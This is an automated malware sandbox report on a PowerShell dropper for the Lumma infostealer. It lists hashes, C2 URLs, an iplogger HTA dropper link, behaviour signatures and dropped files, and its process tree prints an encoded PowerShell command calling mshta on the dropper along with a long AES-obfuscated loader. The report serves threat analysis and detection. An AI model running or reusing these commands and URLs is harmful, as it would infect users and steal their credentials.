Analysis

  • max time kernel
    94s
  • max time network
    130s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05/09/2024, 13:12

General

  • Target

    9a4e23a8c02bdde3512bc6bc2bbd5c4f887994bedefae18944b820a0ee236855.ps1

  • Size

    131B

  • MD5

    5af4a5a13fc361303f37483b171c1c65

  • SHA1

    8d0052f96c26ef0117455de45e15b311d4946f75

  • SHA256

    9a4e23a8c02bdde3512bc6bc2bbd5c4f887994bedefae18944b820a0ee236855

  • SHA512

    85221585c7851b780c5fa5d39ab3cd9f09e3d9b6c4b29ac1bdf7fac94ce772488c3b5605ea38cf691e6d076f430b10f65be38bcc74387d70aeb7c60147bb61a8

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://iplogger.co/2vJ7b7

Extracted

Family

lumma

C2

https://dairyucoemwk.shop/api

https://condedqpwqm.shop/api

Signatures

  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Blocklisted process makes network request 4 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

    Using powershell.exe command.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 17 IoCs

Processes

  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\9a4e23a8c02bdde3512bc6bc2bbd5c4f887994bedefae18944b820a0ee236855.ps1
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:320
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -eC bQBzAGgAdABhACAAaAB0AHQAcABzADoALwAvAGkAcABsAG8AZwBnAGUAcgAuAGMAbwAvADIAdgBKADcAYgA3AA==
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4744
      • C:\Windows\system32\mshta.exe
        "C:\Windows\system32\mshta.exe" https://iplogger.co/2vJ7b7
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:1284
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function iXIQXG($tvnOyfW){return -split ($tvnOyfW -replace '..', '0x$& ')};$kQFqNP = iXIQXG('C9F2793CB7769DE8EE92CC187747074745E3EA3043439C3196B18B2757689F43B821EA6C49193515DC2E82AD9551B8DA597D522159538BB47FDF58446356ED06AFD674F314AEBB1BCBB8B389A09A43537B6EF98A06D7EEAB3A4E5E71391C3FEDF5F90DB240D8258DE9EB1795D4F48833745D4D417EAD9B69112F5FF18835196FD76257367BC2D600D96AA785829B201DE2986A042D1AD6B5FE167598B3DE3CC06180EC8FB0CB078EBFAD4C02221A5FB30D17D9D25C70AC71809D797C0245B5F8CABBAE2178CEDEBD2D7EC56CA0C178E4EB48D65D4285F9AECEFFCDF20CA74CA31E806F785A4244E9B42ADF61A64A9C3CE875961A8754175DE272D455C84FD1DBB61AF31269275952C62DABD14F6074953F666D2D5E0FD47BF227BA835960D619ACEC649153EE52D42A760B5362C0221A6D1C084DD374A748C78EF4B9DCF67A1CEFD1A222476998D564E00D98E3FF7CA037D2E853780AD9DC54287D64D014A75BAAAE84F8BAE53E72CE9AB1C55353098D4EDA82F50FC9ADC08BDB53F14383679E795A9E44A1D5A16F1CB93DA991822AD642FBBEC06E60DEB14E23EDB5F1CA02CDA7D36F3C5AE9CD89CC7B97618682D05CB82A1A7C2C40BF22DCB2EFAB9E028C0E687EEDB4E09E58768AF9C435821A6A745E1B42D453BA2F591C1225D048542D082E0840C14AAF7669195909D670B9AF8AB9CC70CE0AEF64655E2B09C8A41D09522373BB3C3850035CF63F0D0E987F14B5DFF25D614BD2BF1BCCE9600E0D2C0C6E98AD925CE73A81802803EE751B8362A72E80C4A7CE6D0961DA1C5E346A1B0C427FFA73444F91B06E5AD38B4EC4B9569BC84CC33C8BCB1E7E7B6E9C4C2B59B60482411C849227A8F93C2EEF8B56805DE728C239BD77B408FDCF1C3CFB7EEA1781F6B1D73F8865F212F5F7FBD08E27F6C06D94F096325A9092CE310925BCE43C8E02A9C3AE9E757F1DF657E24EE9C638FF1D348BB7CB1BF85603E8E7854B9E5170960F941780BBF18D793FD32FD6F59DF06CF294A907ACEA1D0518FFAA6A437D8EB26A69877ACC6515B87BBB76404D73AE6B9669DD740C912D1077C73B9D60CE15C24DB50454441730E4BA62DBAF14A2A2F7628B0EA85CD1B4BE48B76F46B4370445DC50F9DFADBA3530B30C788E848AFA455F8B65A42DC59AD970D65D36133AFBD6F44085DE216AA4E84977AC231E8554BBF8DF0E0E65593E094B323F42F3717AD9E4F6C81BB0829860308F18E1C2F92CEFF64B637157C7DD2B706B3817EAB68C0ACD89B81A37437F2220C394F99D56AEB23566D1D1A3D89EA0E2DDF99DAE2AB169799851B72D174076E98344909FAAD644910164C3338D23875E6F759AC54C260B9057D42351C7F82AFEF5A0068557288353343026D1C957374105161CF024965EEAC69185C6B963E102AD8D548121923C49EC3AAEF113E099C0E164C7EFE464199F58334D35EE85F26820F9060B8D06FC20B255A124A671A73B5A1CADF2514E906E140A7390CFD0FEBEE41E9163FD65368105A233DB8D4D9A66D6404226FDE4F4E0C86ED34355FE957618FF32BA29898B0E8857603D4CE47A2D0159F44A6C59845F4063325CFE737B538B10EF7357B6227BEB16DA7D69FC4374E35BFAA069B91BA79B32000C05DC625A0B2A32B1F9A83CED6271FFC07729E9572F835578FFB8410ED2518B246D83B0834094C34FC68C53478228858D5B14D6963B99FDC3DD615A3C5EE38440B3A13B34FA7349F53F8AEB12EDB0ACED2949A18F74E6A80BD57A959246CE42267D922C69426620DBC59841707BC20994ECB84361B763F7607003699FF9C7F08C1448D6BB003E18D055D441F4E91A142418A51EB4C0FD2E1054FA');$hRQJT = [System.Security.Cryptography.Aes]::Create();$hRQJT.Key = iXIQXG('4D5754704F764A527165755858615A58');$hRQJT.IV = New-Object byte[] 16;$ymWKAgnI = $hRQJT.CreateDecryptor();$GNhLuFfFx = $ymWKAgnI.TransformFinalBlock($kQFqNP, 0, $kQFqNP.Length);$WVrcoNzKK = [System.Text.Encoding]::Utf8.GetString($GNhLuFfFx);$ymWKAgnI.Dispose();& $WVrcoNzKK.Substring(0,3) $WVrcoNzKK.Substring(3)
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4216
          • C:\Users\Admin\AppData\Local\Temp\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of WriteProcessMemory
            PID:788
            • C:\Windows\SysWOW64\more.com
              C:\Windows\SysWOW64\more.com
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of WriteProcessMemory
              PID:452
              • C:\Users\Admin\AppData\Local\Temp\LarkManger.a3x
                C:\Users\Admin\AppData\Local\Temp\LarkManger.a3x
                7⤵
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                PID:2052
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2052 -s 1376
                  8⤵
                  • Program crash
                  PID:4744
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:5068
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 372 -p 2052 -ip 2052
      1⤵
        PID:4780

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        64B

        MD5

        5caad758326454b5788ec35315c4c304

        SHA1

        3aef8dba8042662a7fcf97e51047dc636b4d4724

        SHA256

        83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

        SHA512

        4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

      • C:\Users\Admin\AppData\Local\Temp\LarkManger.a3x

        Filesize

        921KB

        MD5

        3f58a517f1f4796225137e7659ad2adb

        SHA1

        e264ba0e9987b0ad0812e5dd4dd3075531cfe269

        SHA256

        1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48

        SHA512

        acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634

      • C:\Users\Admin\AppData\Local\Temp\Setup.exe

        Filesize

        2.2MB

        MD5

        d9530ecee42acccfd3871672a511bc9e

        SHA1

        89b4d2406f1294bd699ef231a4def5f495f12778

        SHA256

        81e04f9a131534acc0e9de08718c062d3d74c80c7f168ec7e699cd4b2bd0f280

        SHA512

        d5f048ea995affdf9893ec4c5ac5eb188b6714f5b6712e0b5a316702033421b145b8ee6a62d303eb4576bf8f57273ff35c5d675807563a31157136f79d8a9980

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hcozmlfg.iic.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Users\Admin\AppData\Local\Temp\adu

        Filesize

        71KB

        MD5

        34c206a2d14137066f458912bdf7b16b

        SHA1

        6ce3c3f51697c475e2eba5ad0c2b6b33b8c7b818

        SHA256

        127c13e44fb045fd308805075efb8b545ac67551f92935ef7c84187701d14792

        SHA512

        1b7d4a55de6a1c2656d2490734a0d684b519cbef136f3ae97b87f9092407c13d0b2a8b2dd3bf9bad8ec339b02eeedcbe7dba9d404dce599051f507e3771da252

      • C:\Users\Admin\AppData\Local\Temp\c180505a

        Filesize

        2.0MB

        MD5

        74adf741c2cc8d1b509fd48d6ec4d36c

        SHA1

        e044dbf4d97cee28ba107c8ef42ddbd6463206fa

        SHA256

        7ba7b50bbc3365d58f43d70db646e218ce87dbb5c91ab701c1fbbdc7ff6ee98e

        SHA512

        db41aa3fc4d739a273835f1c26fe3076d9a5dfd864096387f4e18991fe0bdf3fd6c765504dc327e6e697bbe645c468bbe8a5bce20564ec2d7dbf9f6cf105920c

      • C:\Users\Admin\AppData\Local\Temp\d3dx9_43.dll

        Filesize

        1.9MB

        MD5

        989fafc41d9d53e6b0dd1a29da287ee2

        SHA1

        3af440d66a27c8f1d90ce198c7f3016775c13edb

        SHA256

        0c9d304469d274d082a4b1675f4701edc8a8dd2177817f220f633ae32f4b60e5

        SHA512

        253238cb1738c187aee2877f5159ee18d9ba1718495d5ae54ed84d9de369c2eebc97842c15a926aba46813051bb831fd9bf68e3cb5b33751f503bf321d19ce57

      • C:\Users\Admin\AppData\Local\Temp\nlxtrw

        Filesize

        1.4MB

        MD5

        612336b41291dd4855d77d3ba228e527

        SHA1

        4f1aed3cb2bac4f62ec672b78ac7f829ab5c01c7

        SHA256

        a0579a6d6471adb6b10420a823fa264e61b8a269d69b6193d97e71c66c6af1a6

        SHA512

        35da1708cb649986440364b2ee8577a720561d88de3e02745b6fa5a741da996fb4f5f9dd9e46b004c60f7e180e3830122f3535318bdac95b2a07312070a80d81

      • C:\Users\Admin\AppData\Local\Temp\resource\Font\Pfm\Locals\he.pak

        Filesize

        124KB

        MD5

        209974550cc2a835f1879995851b424a

        SHA1

        f09850b9e7fffce197e362b9562cd0ff1c5c71ed

        SHA256

        ca440d0128b62e35333730c5925992ae5b4b05a37c10105a9145eb5cf7a77071

        SHA512

        4ab857adeab0e45f03868d1208d8f3250bbe27c5854bbc885e94e7e6ed8bcf9bdb2ff5035bebb1958b345ecadf244dcc433d760643ea544066b32f3f1e266276

      • C:\Users\Admin\AppData\Local\Temp\resource\Font\Pfm\Locals\hi.pak

        Filesize

        206KB

        MD5

        fa034eb13d21ce4e9fc2d3eafdf40cd2

        SHA1

        0992d91706d26b6cc2ff64d899308ba4e9380a35

        SHA256

        1ca6a0546f9627fa9ba3d377d79a21ff26ec9b349d47247c9b241a70728d0699

        SHA512

        4f8024f43a70d9d8ae67848e2540b028cf1b9183b7dedd66043fb16394601da986d695c8d28f072444a69c1b2639c8b79096065389069fb854d152db166ed734

      • C:\Users\Admin\AppData\Local\Temp\resource\Font\Pfm\Locals\hr.pak

        Filesize

        99KB

        MD5

        624bce9b02382312f4588d3147b738a3

        SHA1

        8df16c75c9e86a96d9f2b11e80eb182ba6c8eef9

        SHA256

        64e531e46cf5b644d1b7f1df885efcf51a65db50fab65ab250f5e4e1adfa9d29

        SHA512

        e74e56210cb3c184499de4e0d9e57e8ee9d7314b93fb1a97030a3397cc47b91ec74c704b25fc4bd16f4c7680240ae1d39d69cd9f024dd52c90eae9cc6c53b6ae

      • C:\Users\Admin\AppData\Local\Temp\resource\Font\Pfm\Locals\hu.pak

        Filesize

        106KB

        MD5

        ca8a821ff5a6b848c5a170ff9a97bb39

        SHA1

        a98b91fa29848013cef021ec8b3a29979cac0c65

        SHA256

        fdd99d667419612bf98200783e0ccf0f7c11913ca03ca162d72d43f6861e5478

        SHA512

        e475a09e1f9f740b6c36c9b33b20f263896b869d8ac58848504db29903a9597b84761b9c3918addc9c726d4429a0f496f44e3a8b0cce9a3008d071a5d46bb5c6

      • C:\Users\Admin\AppData\Local\Temp\resource\Locals\am.pak

        Filesize

        145KB

        MD5

        4e7db89a9f5c07a295de43b745e5658b

        SHA1

        3f24cbc02d130ed156f1b4c57dc951a9238dc8ef

        SHA256

        4c0b4273dc4103c666ff01ed8b9db995f68c5c178973465bb25cd5cdf99ef01a

        SHA512

        c4117d50e2b966345ff86aade385552915ba41bb176fcdcd402fb54949377f00d17eea384ec90df2e3db92354198ce600131b7609eedf108f7b919d5ba330611

      • C:\Users\Admin\AppData\Local\Temp\resource\Locals\ar.pak

        Filesize

        148KB

        MD5

        70bb1c831327b26e4dd74097f59a55b0

        SHA1

        46cf431d19bff9646ae6c6fd0c57e25664178d14

        SHA256

        776db47dd91bce8bc813a54a815be3e73b6e58e9fe5f24db7bf0d8c06a240f6a

        SHA512

        8f78d18e15ee86b801cb49ee4ee7f5dc06f9730181b849ede944c5d922f7c7ab5814d7879399a712e8bb56b1878011552b6a667a6b8dccef6c6be3f236c3f44a

      • C:\Users\Admin\AppData\Local\Temp\resource\Locals\fi.pak

        Filesize

        93KB

        MD5

        c865b2cab8dd25682b40006832a4b604

        SHA1

        0722c7157c96eff7a4ac85a113cf21c4d0e27b1f

        SHA256

        528e453ee8fd16b6e2066b5417b115504cd31afc4ffbd79206369c747caad1fe

        SHA512

        8eb3dbff515e18f481f62e8f3ac17ea7674ea8adf0c37b0bb2c5da6c9914b9376a8dac35f2e004a313fc5f2507e7200bfcc3b5973ae428df147d93b26ed3965b

      • C:\Users\Admin\AppData\Local\Temp\resource\Locals\fil.pak

        Filesize

        103KB

        MD5

        60d50ee0763200548c9df4b4bc712cd1

        SHA1

        206f9cd895936fd7f597b72446c529881cde9829

        SHA256

        500906ac9cab570726fe2c3c819eec3f88cb69f326857920d8423883c222c773

        SHA512

        f59a30f34eab4bec57b6e5d3e53e0b13b74db64f50a9d7b33c9a6fad63de3a80a2436fe8483355d3632fabbc613e1aeb38a3792c4296773fbe50e23ba1e7dee5

      • C:\Users\Admin\AppData\Local\Temp\resource\Locals\fr.pak

        Filesize

        109KB

        MD5

        b5bce917fb4d322dad4b26febaaef09f

        SHA1

        891fd73ba1c70be635772386e4bf3cb13496fb59

        SHA256

        0ddb18e05d4a58c010a42207af0ffdfaf12f9bee29f6971459bd69fdf26b0e79

        SHA512

        a795e60a2197f4a2f9644e2b4c96635472e270274e991cc1130edc64e112f2d527577ff3b7bf7539fc62e724687f82330bc59e3adeaeb37000a60dcd4e503425

      • C:\Users\Admin\AppData\Local\Temp\resource\Locals\gu.pak

        Filesize

        199KB

        MD5

        b0b1b848ceafcaf9e0dcde8bcf7492d8

        SHA1

        39e929ebc69acc4c6610b9c3382c49a376ac9052

        SHA256

        5a23541ce618f91b78a809fe91a0c68681e20018c4411e00d8c205ab1d850dbf

        SHA512

        7ac783936a15c1313dd7a68961ee98e4d351b60d3ef1e5bd89ef02456145fcca5147884038950a8b9ed0de7ed37ed6f3c2ce9b82de5e3a426ec7e5e918e5b2c7

      • C:\Users\Admin\AppData\Local\Temp\resource\Locals\id.pak

        Filesize

        91KB

        MD5

        c26b55aa25d424653e75ac278b0bca42

        SHA1

        fb49a3940c6380d6af38a82c95ca56cd3aefbeab

        SHA256

        03e35e4c8d682d80ebde0492ba01d5a922766daf70df6cb2a22a5a5365adff1e

        SHA512

        b701aee8c2d2490309c902cf152ea118d90429caabfef4774802319871bec4c94fe41d5a305d6df7b698ca051b21332a7422a63777470d781c70100ff758726f

      • C:\Users\Admin\AppData\Local\Temp\resource\Locals\lt.pak

        Filesize

        107KB

        MD5

        6b4c975b9a0b31fa4c0f8818ec53942c

        SHA1

        dcc10f3758945824b092d071424f9ecb413a353c

        SHA256

        70996649507cc815f0c4886f8c4822d45c5e201e8e41dc464ab4973ea19d8a23

        SHA512

        4ad012581c3853d944152519202e1df67dbfee2fa752c3114da5bf8cb6653f1cb093d5bf951795990a0e0e5d16c8375ab99074cafecbce518ab83ddaa30d2dd9

      • C:\Users\Admin\AppData\Local\Temp\resource\Locals\lv.pak

        Filesize

        107KB

        MD5

        2ac1161c66a47bb69378559c2c6fb44d

        SHA1

        a1e28a5ae021fe5cbf57ed7e6e7177114421bfa6

        SHA256

        605d916a697824c4ad6c418d6e7cc157b85825da5dc08a0716d89c56bef0a6fc

        SHA512

        2e5a9d0ed020447e6482feed0770c7f1f12118591c7412b4bb796a2219b9977632cfcef16faa0f28064d8b19c2dafc4fd2cae929d57bdabd37702152fa850855

      • memory/320-11-0x00007FF8739C0000-0x00007FF874481000-memory.dmp

        Filesize

        10.8MB

      • memory/320-12-0x00007FF8739C0000-0x00007FF874481000-memory.dmp

        Filesize

        10.8MB

      • memory/320-31-0x00007FF8739C0000-0x00007FF874481000-memory.dmp

        Filesize

        10.8MB

      • memory/320-3-0x000001F2A0F80000-0x000001F2A0FA2000-memory.dmp

        Filesize

        136KB

      • memory/320-0-0x00007FF8739C3000-0x00007FF8739C5000-memory.dmp

        Filesize

        8KB

      • memory/452-541-0x00000000766D0000-0x0000000076C83000-memory.dmp

        Filesize

        5.7MB

      • memory/452-539-0x00007FF891D10000-0x00007FF891F05000-memory.dmp

        Filesize

        2.0MB

      • memory/788-531-0x00000000766D0000-0x0000000076C83000-memory.dmp

        Filesize

        5.7MB

      • memory/788-532-0x00007FF891D10000-0x00007FF891F05000-memory.dmp

        Filesize

        2.0MB

      • memory/788-536-0x00000000766D0000-0x0000000076C83000-memory.dmp

        Filesize

        5.7MB

      • memory/2052-545-0x00007FF891D10000-0x00007FF891F05000-memory.dmp

        Filesize

        2.0MB

      • memory/2052-546-0x00000000008D0000-0x0000000000940000-memory.dmp

        Filesize

        448KB

      • memory/2052-548-0x00000000008D0000-0x0000000000940000-memory.dmp

        Filesize

        448KB

      • memory/4216-52-0x000001FA7C960000-0x000001FA7C96A000-memory.dmp

        Filesize

        40KB

      • memory/4216-51-0x000001FA7C970000-0x000001FA7C982000-memory.dmp

        Filesize

        72KB

      • memory/4744-22-0x00007FF8739C0000-0x00007FF874481000-memory.dmp

        Filesize

        10.8MB

      • memory/4744-23-0x00007FF8739C0000-0x00007FF874481000-memory.dmp

        Filesize

        10.8MB

      • memory/4744-26-0x00007FF8739C0000-0x00007FF874481000-memory.dmp

        Filesize

        10.8MB

      • memory/4744-49-0x00007FF8739C0000-0x00007FF874481000-memory.dmp

        Filesize

        10.8MB